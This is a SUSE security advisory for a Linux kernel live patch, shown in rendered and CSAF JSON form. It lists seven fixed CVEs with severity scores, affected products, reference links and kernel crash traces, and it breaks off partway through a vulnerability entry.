"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:04:40Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
SUSE-SU-2026:1099-1
Vulnerability from csaf_suse - Published: 2026-03-27 04:33 - Updated: 2026-03-27 04:33Summary
Security update for the Linux Kernel (Live Patch 5 for SUSE Linux Enterprise 15 SP7)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 5 for SUSE Linux Enterprise 15 SP7)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 6.4.0-150700.53.19 fixes various security issues
The following security issues were fixed:
- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).
- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).
- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1097,SUSE-2026-1099,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1097,SUSE-SLE-Module-Live-Patching-15-SP7-2026-1104
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.3 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
39 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 5 for SUSE Linux Enterprise 15 SP7)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 6.4.0-150700.53.19 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).\n- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).\n- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1097,SUSE-2026-1099,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1097,SUSE-SLE-Module-Live-Patching-15-SP7-2026-1104",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1099-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1099-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261099-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1099-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/025013.html"
},
{
"category": "self",
"summary": "SUSE Bug 1255053",
"url": "https://bugzilla.suse.com/1255053"
},
{
"category": "self",
"summary": "SUSE Bug 1255378",
"url": "https://bugzilla.suse.com/1255378"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1255895",
"url": "https://bugzilla.suse.com/1255895"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE Bug 1257669",
"url": "https://bugzilla.suse.com/1257669"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 5 for SUSE Linux Enterprise 15 SP7)",
"tracking": {
"current_release_date": "2026-03-27T04:33:50Z",
"generator": {
"date": "2026-03-27T04:33:50Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1099-1",
"initial_release_date": "2026-03-27T04:33:50Z",
"revision_history": [
{
"date": "2026-03-27T04:33:50Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_73-default-4-150600.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_73-default-4-150600.2.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150600_23_73-default-4-150600.2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_73-default-4-150600.2.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_73-default-4-150600.2.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150600_23_73-default-4-150600.2.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_73-default-4-150600.2.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_73-default-4-150600.2.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150600_23_73-default-4-150600.2.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp6"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp7"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-40258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix race condition in mptcp_schedule_work()\n\nsyzbot reported use-after-free in mptcp_schedule_work() [1]\n\nIssue here is that mptcp_schedule_work() schedules a work,\nthen gets a refcount on sk-\u003esk_refcnt if the work was scheduled.\nThis refcount will be released by mptcp_worker().\n\n[A] if (schedule_work(...)) {\n[B] sock_hold(sk);\n return true;\n }\n\nProblem is that mptcp_worker() can run immediately and complete before [B]\n\nWe need instead :\n\n sock_hold(sk);\n if (schedule_work(...))\n return true;\n sock_put(sk);\n\n[1]\nrefcount_t: addition on 0; use-after-free.\n WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25\nCall Trace:\n \u003cTASK\u003e\n __refcount_add include/linux/refcount.h:-1 [inline]\n __refcount_inc include/linux/refcount.h:366 [inline]\n refcount_inc include/linux/refcount.h:383 [inline]\n sock_hold include/net/sock.h:816 [inline]\n mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943\n mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316\n call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747\n expire_timers kernel/time/timer.c:1798 [inline]\n __run_timers kernel/time/timer.c:2372 [inline]\n __run_timer_base+0x648/0x970 kernel/time/timer.c:2384\n run_timer_base kernel/time/timer.c:2393 [inline]\n run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n run_ktimerd+0xcf/0x190 kernel/softirq.c:1138\n smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40258",
"url": "https://www.suse.com/security/cve/CVE-2025-40258"
},
{
"category": "external",
"summary": "SUSE Bug 1254843 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "external",
"summary": "SUSE Bug 1255053 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1255053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:33:50Z",
"details": "important"
}
],
"title": "CVE-2025-40258"
},
{
"cve": "CVE-2025-40284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: MGMT: cancel mesh send timer when hdev removed\n\nmesh_send_done timer is not canceled when hdev is removed, which causes\ncrash if the timer triggers after hdev is gone.\n\nCancel the timer when MGMT removes the hdev, like other MGMT timers.\n\nShould fix the BUG: sporadically seen by BlueZ test bot\n(in \"Mesh - Send cancel - 1\" test).\n\nLog:\n------\nBUG: KASAN: slab-use-after-free in run_timer_softirq+0x76b/0x7d0\n...\nFreed by task 36:\n kasan_save_stack+0x24/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3a/0x60\n __kasan_slab_free+0x43/0x70\n kfree+0x103/0x500\n device_release+0x9a/0x210\n kobject_put+0x100/0x1e0\n vhci_release+0x18b/0x240\n------",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40284",
"url": "https://www.suse.com/security/cve/CVE-2025-40284"
},
{
"category": "external",
"summary": "SUSE Bug 1254860 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1254860"
},
{
"category": "external",
"summary": "SUSE Bug 1257669 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1257669"
}
],
"remediations": [
{
